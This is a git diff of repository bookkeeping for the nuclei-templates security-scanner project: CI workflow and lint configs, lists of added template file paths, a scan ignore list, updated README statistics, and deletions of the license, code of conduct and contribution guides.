||||||
|
|
||||||
|
- name: Update Templates
|
||||||
|
id: update-templates
|
||||||
|
run: |
|
||||||
|
python3 .github/scripts/wordpress-plugins-update.py
|
||||||
|
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.update-templates.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git add --all
|
||||||
|
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:"
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
if: steps.update-templates.outputs.CHANGES > 0
|
||||||
|
uses: ad-m/github-push-action@master
|
||||||
|
with:
|
||||||
|
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
branch: ${{ github.ref }}
|
|
@ -0,0 +1,6 @@
|
||||||
|
.idea/
|
||||||
|
.DS_Store
|
||||||
|
local/
|
||||||
|
.checksum
|
||||||
|
.new-additions
|
||||||
|
*.txt
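Review bot: The `*.txt` pattern also matches `cves.json-checksum.txt` and `templates-checksum.txt`, which workflows in this commit generate and then stage with a plain `git add`. If those files are not already tracked, `git status -s` will not count them and `git add` without `-f` refuses ignored paths, so the commit step would be skipped or fail; only `.new-additions` is staged with `-f`. Adding the negations `!cves.json-checksum.txt` and `!templates-checksum.txt` after `*.txt` would make the workflows independent of whether the files are already tracked.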
|
141
.new-additions
141
.new-additions
|
@ -1,97 +1,44 @@
|
||||||
code/privilege-escalation/linux/binary/privesc-aa-exec.yaml
|
cloud/enum/aws-app-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-ash.yaml
|
cloud/enum/aws-s3-bucket-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-awk.yaml
|
cloud/enum/azure-db-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-bash.yaml
|
cloud/enum/azure-vm-cloud-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-cdist.yaml
|
cloud/enum/azure-website-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-choom.yaml
|
cloud/enum/gcp-app-engine-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-cpulimit.yaml
|
cloud/enum/gcp-bucket-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-csh.yaml
|
cloud/enum/gcp-firebase-app-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-csvtool.yaml
|
cloud/enum/gcp-firebase-rtdb-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-dash.yaml
|
code/cves/2019/CVE-2019-14287.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-dc.yaml
|
code/cves/2021/CVE-2021-3156.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-distcc.yaml
|
http/cves/2015/CVE-2015-2794.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-elvish.yaml
|
http/cves/2020/CVE-2020-12124.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-enscript.yaml
|
http/cves/2023/CVE-2023-41109.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-env.yaml
|
http/cves/2023/CVE-2023-42343.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-expect.yaml
|
http/cves/2023/CVE-2023-44353.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-find.yaml
|
http/cves/2023/CVE-2023-46574.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-fish.yaml
|
http/cves/2023/CVE-2023-50917.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-flock.yaml
|
http/cves/2023/CVE-2023-50968.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-gawk.yaml
|
http/cves/2023/CVE-2023-51467.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-grc.yaml
|
http/cves/2023/CVE-2023-6379.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-ionice.yaml
|
http/cves/2023/CVE-2023-6623.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-julia.yaml
|
http/cves/2024/CVE-2024-0352.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-lftp.yaml
|
http/default-logins/camunda/camunda-default-login.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-ltrace.yaml
|
http/exposed-panels/goodjob-dashboard.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-lua.yaml
|
http/exposed-panels/onlyoffice-login-panel.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-mawk.yaml
|
http/exposures/docker-daemon-exposed.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-multitime.yaml
|
http/misconfiguration/apache/apache-server-status.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-mysql.yaml
|
http/misconfiguration/cookies-without-httponly-secure.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-nawk.yaml
|
http/misconfiguration/php/php-composer-binary.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-nice.yaml
|
http/osint/piratebay.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-node.yaml
|
http/technologies/cisco-asa-detect.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-nsenter.yaml
|
http/token-spray/api-openai.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-perl.yaml
|
http/vulnerabilities/dahua/dahua-icc-backdoor-user.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-pexec.yaml
|
http/vulnerabilities/dlink/dlink-netgear-xss.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-php.yaml
|
http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-posh.yaml
|
http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-python.yaml
|
http/vulnerabilities/wanhu/wanhuoa-downloadservlet-lfi.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-rake.yaml
|
http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-rc.yaml
|
javascript/network/smb/smb-anonymous-access.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-rlwrap.yaml
|
javascript/network/smb/smb-shares.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-rpm.yaml
|
javascript/network/smb/smb-signing-not-required.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-rpmdb.yaml
|
javascript/network/smb/smb2-capabilities.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-rpmverify.yaml
|
network/misconfig/erlang-daemon.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-ruby.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-run-parts.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-sash.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-slsh.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-socat.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-softlimit.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-sqlite3.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-ssh-agent.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-sshpass.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-stdbuf.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-strace.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-tar.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-tcsh.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-time.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-timeout.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-tmate.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-torify.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-torsocks.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-unshare.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-vi.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-view.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-vim.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-xargs.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-xdg-user-dir.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-yash.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-zsh.yaml
|
|
||||||
code/privilege-escalation/linux/rw-shadow.yaml
|
|
||||||
code/privilege-escalation/linux/rw-sudoers.yaml
|
|
||||||
code/privilege-escalation/linux/sudo-nopasswd.yaml
|
|
||||||
code/privilege-escalation/linux/writable-etc-passwd.yaml
|
|
||||||
dns/dns-rebinding.yaml
|
|
||||||
http/cves/2018/CVE-2018-10942.yaml
|
|
||||||
http/cves/2023/CVE-2023-22527.yaml
|
|
||||||
http/cves/2023/CVE-2023-27639.yaml
|
|
||||||
http/cves/2023/CVE-2023-27640.yaml
|
|
||||||
http/cves/2023/CVE-2023-47211.yaml
|
|
||||||
http/cves/2023/CVE-2023-48023.yaml
|
|
||||||
http/cves/2023/CVE-2023-6023.yaml
|
|
||||||
http/cves/2023/CVE-2023-6875.yaml
|
|
||||||
http/cves/2024/CVE-2024-0204.yaml
|
|
||||||
http/default-logins/node-red/nodered-default-login.yaml
|
|
||||||
http/default-logins/powershell/powershell-default-login.yaml
|
|
||||||
http/exposed-panels/autoset-detect.yaml
|
|
||||||
http/exposed-panels/compalex-detect.yaml
|
|
||||||
http/exposed-panels/doris-panel.yaml
|
|
||||||
http/exposures/configs/vbulletin-path-disclosure.yaml
|
|
||||||
http/exposures/logs/go-pprof-debug.yaml
|
|
||||||
http/miscellaneous/defacement-detect.yaml
|
|
||||||
http/misconfiguration/doris-dashboard.yaml
|
|
||||||
http/vulnerabilities/apache/apache-nifi-rce.yaml
|
|
||||||
http/vulnerabilities/juniper/junos-xss.yaml
|
|
||||||
http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml
|
|
||||||
http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml
|
|
||||||
|
|
|
@ -0,0 +1,31 @@
|
||||||
|
# ==| Nuclei Templates Ignore list |==
|
||||||
|
# ====================================
|
||||||
|
#
|
||||||
|
# This is default list of tags and files to excluded from default nuclei scan.
|
||||||
|
# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion
|
||||||
|
#
|
||||||
|
# ============ DO NOT EDIT ============
|
||||||
|
# Automatically updated by nuclei on execution from nuclei-templates
|
||||||
|
# User changes should be in nuclei config file
|
||||||
|
# ============ DO NOT EDIT ============
|
||||||
|
|
||||||
|
# tags is a list of tags to ignore execution for
|
||||||
|
# unless asked for by the user.
|
||||||
|
|
||||||
|
tags:
|
||||||
|
- "fuzz"
|
||||||
|
- "dos"
|
||||||
|
|
||||||
|
# The following templates have been excluded because they have weak matchers and may generate FP results.
|
||||||
|
# Please feel free to create PR if you can update the templates with strict matchers.
|
||||||
|
|
||||||
|
# files is a list of files to ignore template execution
|
||||||
|
# unless asked for by the user.
|
||||||
|
|
||||||
|
files:
|
||||||
|
- http/cves/2006/CVE-2006-1681.yaml
|
||||||
|
- http/cves/2019/CVE-2019-14696.yaml
|
||||||
|
- http/cves/2020/CVE-2020-2036.yaml
|
||||||
|
- http/cves/2020/CVE-2020-28351.yaml
|
||||||
|
- http/vulnerabilities/oracle/oracle-ebs-xss.yaml
|
||||||
|
- http/cves/2021/CVE-2021-28164.yaml
|
|
@ -0,0 +1,10 @@
|
||||||
|
repos:
|
||||||
|
- repo: https://github.com/pre-commit/pre-commit-hooks
|
||||||
|
rev: v2.3.0
|
||||||
|
hooks:
|
||||||
|
- id: end-of-file-fixer
|
||||||
|
- id: trailing-whitespace
|
||||||
|
- repo: https://github.com/adrienverge/yamllint.git
|
||||||
|
rev: v1.17.0
|
||||||
|
hooks:
|
||||||
|
- id: yamllint
|
|
@ -0,0 +1,26 @@
|
||||||
|
---
|
||||||
|
extends: default
|
||||||
|
|
||||||
|
ignore: |
|
||||||
|
.pre-commit-config.yml
|
||||||
|
.github/
|
||||||
|
.git/
|
||||||
|
*.yml
|
||||||
|
|
||||||
|
rules:
|
||||||
|
document-start: disable
|
||||||
|
comments-indentation: disable
|
||||||
|
line-length: disable
|
||||||
|
new-lines: disable
|
||||||
|
new-line-at-end-of-file: disable
|
||||||
|
truthy: disable
|
||||||
|
comments:
|
||||||
|
require-starting-space: true
|
||||||
|
ignore-shebangs: true
|
||||||
|
min-spaces-from-content: 1
|
||||||
|
empty-lines:
|
||||||
|
max: 5
|
||||||
|
braces:
|
||||||
|
forbid: true
|
||||||
|
brackets:
|
||||||
|
forbid: true
|
|
@ -1,76 +0,0 @@
|
||||||
# Contributor Covenant Code of Conduct
|
|
||||||
|
|
||||||
## Our Pledge
|
|
||||||
|
|
||||||
In the interest of fostering an open and welcoming environment, we as
|
|
||||||
contributors and maintainers pledge to making participation in our project and
|
|
||||||
our community a harassment-free experience for everyone, regardless of age, body
|
|
||||||
size, disability, ethnicity, sex characteristics, gender identity and expression,
|
|
||||||
level of experience, education, socio-economic status, nationality, personal
|
|
||||||
appearance, race, religion, or sexual identity and orientation.
|
|
||||||
|
|
||||||
## Our Standards
|
|
||||||
|
|
||||||
Examples of behavior that contributes to creating a positive environment
|
|
||||||
include:
|
|
||||||
|
|
||||||
* Using welcoming and inclusive language
|
|
||||||
* Being respectful of differing viewpoints and experiences
|
|
||||||
* Gracefully accepting constructive criticism
|
|
||||||
* Focusing on what is best for the community
|
|
||||||
* Showing empathy towards other community members
|
|
||||||
|
|
||||||
Examples of unacceptable behavior by participants include:
|
|
||||||
|
|
||||||
* The use of sexualized language or imagery and unwelcome sexual attention or
|
|
||||||
advances
|
|
||||||
* Trolling, insulting/derogatory comments, and personal or political attacks
|
|
||||||
* Public or private harassment
|
|
||||||
* Publishing others' private information, such as a physical or electronic
|
|
||||||
address, without explicit permission
|
|
||||||
* Other conduct which could reasonably be considered inappropriate in a
|
|
||||||
professional setting
|
|
||||||
|
|
||||||
## Our Responsibilities
|
|
||||||
|
|
||||||
Project maintainers are responsible for clarifying the standards of acceptable
|
|
||||||
behavior and are expected to take appropriate and fair corrective action in
|
|
||||||
response to any instances of unacceptable behavior.
|
|
||||||
|
|
||||||
Project maintainers have the right and responsibility to remove, edit, or
|
|
||||||
reject comments, commits, code, wiki edits, issues, and other contributions
|
|
||||||
that are not aligned to this Code of Conduct, or to ban temporarily or
|
|
||||||
permanently any contributor for other behaviors that they deem inappropriate,
|
|
||||||
threatening, offensive, or harmful.
|
|
||||||
|
|
||||||
## Scope
|
|
||||||
|
|
||||||
This Code of Conduct applies both within project spaces and in public spaces
|
|
||||||
when an individual is representing the project or its community. Examples of
|
|
||||||
representing a project or community include using an official project e-mail
|
|
||||||
address, posting via an official social media account, or acting as an appointed
|
|
||||||
representative at an online or offline event. Representation of a project may be
|
|
||||||
further defined and clarified by project maintainers.
|
|
||||||
|
|
||||||
## Enforcement
|
|
||||||
|
|
||||||
Instances of abusive, harassing, or otherwise unacceptable behavior may be
|
|
||||||
reported by contacting the project team at contact@projectdiscovery.io. All
|
|
||||||
complaints will be reviewed and investigated and will result in a response that
|
|
||||||
is deemed necessary and appropriate to the circumstances. The project team is
|
|
||||||
obligated to maintain confidentiality with regard to the reporter of an incident.
|
|
||||||
Further details of specific enforcement policies may be posted separately.
|
|
||||||
|
|
||||||
Project maintainers who do not follow or enforce the Code of Conduct in good
|
|
||||||
faith may face temporary or permanent repercussions as determined by other
|
|
||||||
members of the project's leadership.
|
|
||||||
|
|
||||||
## Attribution
|
|
||||||
|
|
||||||
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
|
|
||||||
available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
|
|
||||||
|
|
||||||
[homepage]: https://www.contributor-covenant.org
|
|
||||||
|
|
||||||
For answers to common questions about this code of conduct, see
|
|
||||||
https://www.contributor-covenant.org/faq
|
|
|
@ -1,100 +0,0 @@
|
||||||
# Template Contribution Guidelines
|
|
||||||
|
|
||||||
This documentation contains a set of guidelines to help you during the contribution process.
|
|
||||||
We are happy to welcome all the contributions from anyone willing to **improve/add** new **templates** to this project.
|
|
||||||
Thank you for helping out and remember, **no contribution is too small.**
|
|
||||||
|
|
||||||
# Submitting Nuclei Templates 👩💻👨💻
|
|
||||||
|
|
||||||
Below you will find the process and workflow used to review and merge your changes.
|
|
||||||
|
|
||||||
## Step 1 : Find existing templates
|
|
||||||
|
|
||||||
- Take a look at the [Existing Templates](https://github.com/projectdiscovery/nuclei-templates) before creating new one.
|
|
||||||
- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work.
|
|
||||||
- Take a look at [Templates](https://nuclei.projectdiscovery.io/templating-guide/) and [Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) Guideline for creating new template.
|
|
||||||
|
|
||||||
## Step 2 : Fork the Project
|
|
||||||
|
|
||||||
- Fork this Repository. This will create a Local Copy of this Repository on your Github Profile. Keep a reference to the original project in `upstream` remote.
|
|
||||||
|
|
||||||
<img width="928" alt="template-fork" src="https://user-images.githubusercontent.com/8293321/124467966-2afde200-ddb6-11eb-835f-8f8fc2fabedb.png">
|
|
||||||
|
|
||||||
```sh
|
|
||||||
git clone https://github.com/<your-username>/nuclei-templates
|
|
||||||
cd nuclei-templates
|
|
||||||
git remote add upstream https://github.com/projectdiscovery/nuclei-templates
|
|
||||||
```
|
|
||||||
|
|
||||||
- If you have already forked the project, update your copy before working.
|
|
||||||
|
|
||||||
```sh
|
|
||||||
git remote update
|
|
||||||
git checkout main
|
|
||||||
git rebase upstream/main
|
|
||||||
```
|
|
||||||
|
|
||||||
## Step 3 : Create your Template Branch
|
|
||||||
|
|
||||||
Create a new branch. Use its name to identify the issue your addressing.
|
|
||||||
|
|
||||||
```sh
|
|
||||||
# It will create a new branch with name template_branch_name and switch to that branch
|
|
||||||
git checkout -b template_branch_name
|
|
||||||
```
|
|
||||||
|
|
||||||
## Step 4 : Create Template and Commit
|
|
||||||
- Create your template.
|
|
||||||
- Add all the files/folders needed.
|
|
||||||
- After you've made changes or completed template creation, add changes to the branch you've just created by:
|
|
||||||
|
|
||||||
```sh
|
|
||||||
# To add all new files to branch template_branch_name
|
|
||||||
git add .
|
|
||||||
```
|
|
||||||
|
|
||||||
- To commit, give a descriptive message for the convenience of the reviewer by:
|
|
||||||
|
|
||||||
```sh
|
|
||||||
# This message get associated with all files you have changed
|
|
||||||
git commit -m "Added/Fixed/Updated XXX Template"
|
|
||||||
```
|
|
||||||
|
|
||||||
**NOTE**:
|
|
||||||
|
|
||||||
- A Pull Request should have only one unique template to make it simple for review.
|
|
||||||
- Multiple templates for same technology can be grouped into single Pull Request.
|
|
||||||
|
|
||||||
|
|
||||||
## Step 5 : Push Your Changes
|
|
||||||
|
|
||||||
- Now you are ready to push your template to the remote (forked) repository.
|
|
||||||
- When your work is ready and complies with the project conventions, upload your changes to your fork:
|
|
||||||
|
|
||||||
```sh
|
|
||||||
# To push your work to your remote repository
|
|
||||||
git push -u origin template_branch_name
|
|
||||||
```
|
|
||||||
|
|
||||||
## Step 6 : Pull Request
|
|
||||||
|
|
||||||
- Fire up your favorite browser, navigate to your GitHub repository, then click on the New pull request button within the Pull requests tab. Provide a meaningful name and description to your pull request, that describes the purpose of the template.
|
|
||||||
- Voila! Your Pull Request has been submitted. It will be reviewed and merged by the moderators, if it complies with project standards, otherwise a feedback will be provided.🥳
|
|
||||||
|
|
||||||
## Need more help?🤔
|
|
||||||
|
|
||||||
You can refer to the following articles of Git and GitHub basics. In case you are stuck, feel free to contact the Project Mentors and Community by joining [PD Community](https://discord.gg/projectdiscovery) Discord server.
|
|
||||||
|
|
||||||
- [Forking a Repo](https://help.github.com/en/github/getting-started-with-github/fork-a-repo)
|
|
||||||
- [Cloning a Repo](https://help.github.com/en/desktop/contributing-to-projects/creating-an-issue-or-pull-request)
|
|
||||||
- [How to create a Pull Request](https://opensource.com/article/19/7/create-pull-request-github)
|
|
||||||
- [Getting started with Git and GitHub](https://towardsdatascience.com/getting-started-with-git-and-github-6fcd0f2d4ac6)
|
|
||||||
- [Learn GitHub from Scratch](https://lab.github.com/githubtraining/introduction-to-github)
|
|
||||||
|
|
||||||
|
|
||||||
## Tip from us😇
|
|
||||||
|
|
||||||
- **Nuclei** outcomes are only as excellent as **template matchers💡**
|
|
||||||
- Declare at least two matchers to reduce false positive
|
|
||||||
- Avoid matching words reflected in the URL to reduce false positive
|
|
||||||
- Avoid short word that could be encountered anywhere
|
|
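--- a/LICENSE 2.md
+++ b/LICENSE 2.md
@@ -1,21 +0,0 @@
-MIT License
-
-Copyright (c) 2020 ProjectDiscovery, Inc.
-
-Permission is hereby granted, free of charge, to any person obtaining a copy
-of this software and associated documentation files (the "Software"), to deal
-in the Software without restriction, including without limitation the rights
-to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-copies of the Software, and to permit persons to whom the Software is
-furnished to do so, subject to the following conditions:
-
-The above copyright notice and this permission notice shall be included in all
-copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-SOFTWARE.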
|
@ -1,28 +0,0 @@
|
||||||
### Template / PR Information
|
|
||||||
|
|
||||||
<!-- Explains the information and/or motivation for update or/ creating this templates -->
|
|
||||||
<!-- Please include any reference to your template if available -->
|
|
||||||
|
|
||||||
- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
|
|
||||||
- References:
|
|
||||||
|
|
||||||
### Template Validation
|
|
||||||
|
|
||||||
I've validated this template locally?
|
|
||||||
- [ ] YES
|
|
||||||
- [ ] NO
|
|
||||||
|
|
||||||
|
|
||||||
#### Additional Details (leave it blank if not applicable)
|
|
||||||
|
|
||||||
<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
|
|
||||||
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
|
|
||||||
<!-- Please do NOT include vulnerable host information in pull requests -->
|
|
||||||
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->
|
|
||||||
|
|
||||||
### Additional References:
|
|
||||||
|
|
||||||
- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
|
|
||||||
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
|
|
||||||
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
|
|
||||||
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
||||||
| cve | 2318 | dhiyaneshdk | 1135 | http | 6947 | info | 3351 | file | 312 |
|
| cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 |
|
||||||
| panel | 1040 | dwisiswant0 | 801 | file | 312 | high | 1471 | dns | 20 |
|
| panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 |
|
||||||
| wordpress | 941 | daffainfo | 789 | workflows | 191 | medium | 1445 | | |
|
| wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | |
|
||||||
| xss | 851 | pikpikcu | 353 | network | 132 | critical | 933 | | |
|
| xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | |
|
||||||
| exposure | 850 | pussycat0x | 313 | ssl | 27 | low | 251 | | |
|
| exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | |
|
||||||
| wp-plugin | 815 | ritikchaddha | 298 | javascript | 25 | unknown | 34 | | |
|
| wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | |
|
||||||
| osint | 678 | pdteam | 286 | dns | 17 | | | | |
|
| osint | 677 | pdteam | 286 | dns | 17 | | | | |
|
||||||
| tech | 650 | ricardomaia | 229 | headless | 11 | | | | |
|
| tech | 649 | ricardomaia | 229 | headless | 11 | | | | |
|
||||||
| lfi | 622 | geeknik | 225 | cloud | 9 | | | | |
|
| lfi | 619 | geeknik | 224 | code | 3 | | | | |
|
||||||
| edb | 598 | theamanrawat | 221 | code | 5 | | | | |
|
| edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | |
|
||||||
|
|
||||||
**545 directories, 7957 files**.
|
**534 directories, 7902 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
@ -1,96 +0,0 @@
|
||||||
|
|
||||||
|
|
||||||
<h1 align="center">
|
|
||||||
Nuclei 템플릿
|
|
||||||
</h1>
|
|
||||||
<h4 align="center">커뮤니티에서 엄선한, 애플리케이션 보안 취약점을 찾기 위한 Nuclei 엔진용 템플릿 목록</h4>
|
|
||||||
|
|
||||||
|
|
||||||
<p align="center">
|
|
||||||
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
|
|
||||||
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
|
|
||||||
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
|
|
||||||
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
|
|
||||||
</p>
|
|
||||||
|
|
||||||
<p align="center">
|
|
||||||
<a href="https://nuclei.projectdiscovery.io/templating-guide/">가이드 문서</a> •
|
|
||||||
<a href="#-contributions">기여</a> •
|
|
||||||
<a href="#-discussion">논의</a> •
|
|
||||||
<a href="#-community">커뮤니티</a> •
|
|
||||||
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> •
|
|
||||||
<a href="https://discord.gg/projectdiscovery">디스코드</a>
|
|
||||||
</p>
|
|
||||||
|
|
||||||
<p align="center">
|
|
||||||
<a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README.md">English</a> •
|
|
||||||
<a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README_KR.md">한국어</a>
|
|
||||||
</p>
|
|
||||||
|
|
||||||
----
|
|
||||||
|
|
||||||
템플릿은 실제 스캐닝 엔진을 동작하게 하는 [nuclei scanner](https://github.com/projectdiscovery/nuclei)의 핵심입니다.
|
|
||||||
이 저장소는 우리 팀에서 제공하거나, 커뮤니티에서 기여한 다양한 템플릿들을 저장하고 보관합니다.
|
|
||||||
템플릿 목록을 증가시키기 위해서 **pull requests** 나 [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) 를 통해 기여해주시기를 부탁드립니다.
|
|
||||||
|
|
||||||
## Nuclei 템플릿 개요
|
|
||||||
|
|
||||||
고유 태그, 작성자, 디렉토리, 심각도, 템플릿 종류에 대한 통계를 포함하고 있는 nuclei 템플릿의 개요입니다. 아래 표는 각 지표의 상위 10개 항목을 나타내고 있습니다. 더 자세한 정보는 [이곳](TEMPLATES-STATS.md)에서 확인 가능하고, [JSON](TEMPLATES-STATS.json) 형식으로도 확인 가능합니다.
|
|
||||||
|
|
||||||
<table>
|
|
||||||
<tr>
|
|
||||||
<td>
|
|
||||||
|
|
||||||
## Nuclei 템플릿 통계 Top 10
|
|
||||||
|
|
||||||
| 태그 | 개수 | 작성자 | 개수 | 디렉토리 | 개수 | 심각도 | 개수 | 종류 | 개수 |
|
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|
||||||
| cve | 1325 | daffainfo | 629 | cves | 1306 | info | 1398 | http | 3644 |
|
|
||||||
| panel | 604 | dhiyaneshdk | 509 | exposed-panels | 613 | high | 955 | file | 76 |
|
|
||||||
| lfi | 490 | pikpikcu | 322 | vulnerabilities | 506 | medium | 784 | network | 50 |
|
|
||||||
| xss | 451 | pdteam | 269 | technologies | 273 | critical | 445 | dns | 17 |
|
|
||||||
| wordpress | 409 | geeknik | 187 | exposures | 254 | low | 211 | | |
|
|
||||||
| exposure | 360 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
|
|
||||||
| cve2021 | 324 | 0x_akoko | 157 | misconfiguration | 210 | | | | |
|
|
||||||
| rce | 319 | princechaddha | 149 | workflows | 187 | | | | |
|
|
||||||
